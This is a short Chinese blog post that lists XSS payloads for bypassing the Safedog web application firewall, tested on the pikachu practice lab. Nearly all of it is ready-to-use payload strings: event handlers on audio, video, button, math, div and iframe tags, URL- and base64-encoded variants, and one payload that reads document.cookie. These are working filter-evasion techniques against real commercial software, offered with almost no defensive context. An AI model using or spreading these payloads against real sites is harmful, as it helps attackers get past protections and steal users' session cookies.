安全狗XSS攻击绕过
默认安全狗网站防护模块中,将XSS漏洞攻击拦截全部处于开启状态
选择漏洞平台pikachu,使用XSS模块
正常的,输入一段XSS代码(aaa'"><script>alert("222")</script>)后,会被WAF拦截
WAF检测机制默认的将诸如:alert、prompt、comfirm等弹窗类的标签,都做了限制
1.H5新标签<audio>绕过:
<audio src=x onerror=alert(47)>
<audio src=x onerror=prompt(1);>
2.H5新标签<video>绕过:
<video src=x onerror=prompt(1);>
<video src=x onerror=alert(48)>
3.HTML<div>标签绕过:
<div%20onmouseover%3d%27alert%26lpar%3b1%26rpar%3b%27>DIV<%2fdiv>,这个方法只在IE中会弹窗
<div style="width:expression(alert(/1/))">1</div> ,在IE中弹窗
3.HTML<math>标签绕过:
<math><a/xlink:href=javascript:prompt(1)>Xss
<math href="javascript:javascript:alert(1)">Xss</math>
4.HTML<button>标签绕过:
<button onfocus=alert(1) autofocus>
<button/onclick=alert(1)%20>xss</button>
5.HTML<iframe>标签绕过:
<IFRAME width%3d"420" height%3d"315" frameborder%3d"0" onload%3d"alert(document.cookie)"><%2fIFRAME>,读取cookie
<iframe srcdoc%3d'%26lt%3bbody onload%3dprompt%26lpar%3b1%26rpar%3b%26gt%3b'>
<iframe%2fsrc%3d"data%3atext%2fhtml%3b%26Tab%3bbase64%26Tab%3b,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3d%3d">
以上方法均可绕过WAF XSS限制,部分功能需要在IE浏览器中进行测试。
本文来自博客园,作者:田家少闲月-,转载请注明原文链接:https://www.cnblogs.com/zhaoyunxiang/p/15345912.html